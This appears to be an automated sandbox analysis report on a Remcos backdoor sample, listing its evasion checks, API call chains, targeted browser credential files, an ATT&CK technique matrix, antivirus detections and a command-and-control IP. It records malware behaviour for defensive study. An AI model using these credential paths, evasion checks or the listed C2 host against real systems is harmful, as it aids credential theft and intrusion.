              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0040F5B0 Sleep,ExitProcess,0_2_0040F5B0
              Source: C:\Users\user\Desktop\BiU282bjyR.exe TID: 7112Thread sleep time: -78000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\BiU282bjyR.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_0041A1DD
              Source: C:\Users\user\Desktop\BiU282bjyR.exeAPI coverage: 9.2 %
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0040917A __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0040917A
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0040C1C2 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C1C2
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0044E289 FindFirstFileExA,0_2_0044E289
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0041958A FindFirstFileW,FindNextFileW,FindNextFileW,0_2_0041958A
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0040958C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0040958C
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00407763 FindFirstFileW,FindNextFileW,0_2_00407763
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00408733 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_00408733
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0040B9A5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040B9A5
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0040BBAC FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BBAC
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0041BD26 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041BD26
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00407BBE SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407BBE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeAPI call chain: ExitProcess graph end nodegraph_0-48589
              Source: Amcache.hve.3.drBinary or memory string: VMware
              Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
              Source: Amcache.hve.3.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
              Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
              Source: BiU282bjyR.exe, 00000000.00000003.384506320.000000000082A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWa Connection* 8
              Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
              Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.3.drBinary or memory string: VMware7,1
              Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: BiU282bjyR.exe, 00000000.00000003.384506320.000000000082A000.00000004.00000020.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000002.638196781.000000000083D000.00000004.00000020.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000002.638122231.00000000007E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.me
              Source: Amcache.hve.3.drBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
              Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
              Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00434417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00434417
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0041C5E5 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041C5E5
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0044F55D GetProcessHeap,0_2_0044F55D
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00442C95 mov eax, dword ptr fs:[00000030h]0_2_00442C95
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\BiU282bjyR.exeMemory protected: page read and write | page execute read | page execute and read and write | page execute and write copy | page guardJump to behavior
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00434565 SetUnhandledExceptionFilter,0_2_00434565
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00434417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00434417
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0043B4E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043B4E6
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_004349CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004349CC
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe0_2_00411F00
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_004190BC mouse_event,0_2_004190BC
              Source: BiU282bjyR.exe, 00000000.00000002.638122231.00000000007A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: BiU282bjyR.exe, 00000000.00000002.638122231.0000000000803000.00000004.00000020.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000002.638196781.000000000082A000.00000004.00000020.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000002.638122231.00000000007E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00452020
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: GetLocaleInfoW,0_2_004482FC
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: GetLocaleInfoA,0_2_0040F6DA
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_004516E8
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: EnumSystemLocalesW,0_2_00451960
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: EnumSystemLocalesW,0_2_004519AB
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: EnumSystemLocalesW,0_2_00451A46
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00451AD3
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: GetLocaleInfoW,0_2_00451D23
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: EnumSystemLocalesW,0_2_00447DF4
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00451E4C
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: GetLocaleInfoW,0_2_00451F53
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00434643 cpuid 0_2_00434643
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00404F51 GetLocalTime,CreateEventA,CreateThread,0_2_00404F51
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00448B9F _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00448B9F
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0041B0A2 GetComputerNameExW,GetUserNameW,0_2_0041B0A2
              Source: Amcache.hve.3.drBinary or memory string: c:\users\user\desktop\procexp.exe
              Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.3.drBinary or memory string: procexp.exe

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.2970204.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.2970204.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.638122231.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.638302980.0000000002970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BiU282bjyR.exe PID: 7076, type: MEMORYSTR
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\0_2_0040B9A5
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: \key3.db0_2_0040B9A5
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_0040B887

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.2970204.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.2970204.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.638122231.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.638302980.0000000002970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BiU282bjyR.exe PID: 7076, type: MEMORYSTR
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: cmd.exe0_2_0040569A
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Native API
              1
              Windows Service
              1
              Bypass User Access Control
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services11
              Archive Collected Data
              Exfiltration Over Other Network Medium12
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              System Shutdown/Reboot
              Default Accounts12
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              Access Token Manipulation
              1
              Deobfuscate/Decode Files or Information
              21
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol21
              Input Capture
              Exfiltration Over Bluetooth2
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
              Defacement
              Domain Accounts2
              Service Execution
              Logon Script (Windows)1
              Windows Service
              2
              Obfuscated Files or Information
              2
              Credentials In Files
              1
              System Service Discovery
              SMB/Windows Admin Shares12
              Clipboard Data
              Automated Exfiltration1
              Non-Standard Port
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)12
              Process Injection
              2
              Software Packing
              NTDS2
              File and Directory Discovery
              Distributed Component Object ModelInput CaptureScheduled Transfer2
              Non-Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Bypass User Access Control
              LSA Secrets22
              System Information Discovery
              SSHKeyloggingData Transfer Size Limits12
              Application Layer Protocol
              Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common11
              Masquerading
              Cached Domain Credentials41
              Security Software Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items2
              Virtualization/Sandbox Evasion
              DCSync2
              Virtualization/Sandbox Evasion
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation
              Proc Filesystem2
              Process Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)12
              Process Injection
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
              Remote System Discovery
              Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              BiU282bjyR.exe55%ReversingLabsWin32.Backdoor.Remcos
              BiU282bjyR.exe100%AviraBDS/Remcos.cgljq
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://geoplugin.net/json.gp0%URL Reputationsafe
              http://geoplugin.net/json.gp/C0%URL Reputationsafe
              http://geoplugin.net/j0%URL Reputationsafe
              http://geoplugin.net/json.gpI0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpn.net/json.gpps0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp:8&:0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpxx0%Avira URL Cloudsafe
              212.23.211.238100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              178.237.33.50
              truefalse
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpfalse
                • URL Reputation: safe
                unknown
                212.23.211.238true
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://upx.sf.netAmcache.hve.3.drfalse
                  high
                  http://geoplugin.net/json.gp:8&:BiU282bjyR.exe, 00000000.00000003.384506320.0000000000816000.00000004.00000020.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000002.638196781.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://geoplugin.net/json.gp/CBiU282bjyR.exe, 00000000.00000002.638302980.0000000002970000.00000040.00001000.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://geoplugin.net/json.gpIBiU282bjyR.exe, 00000000.00000002.638122231.00000000007CC000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://geoplugin.net/json.gpxxBiU282bjyR.exe, 00000000.00000003.384506320.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000002.638122231.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
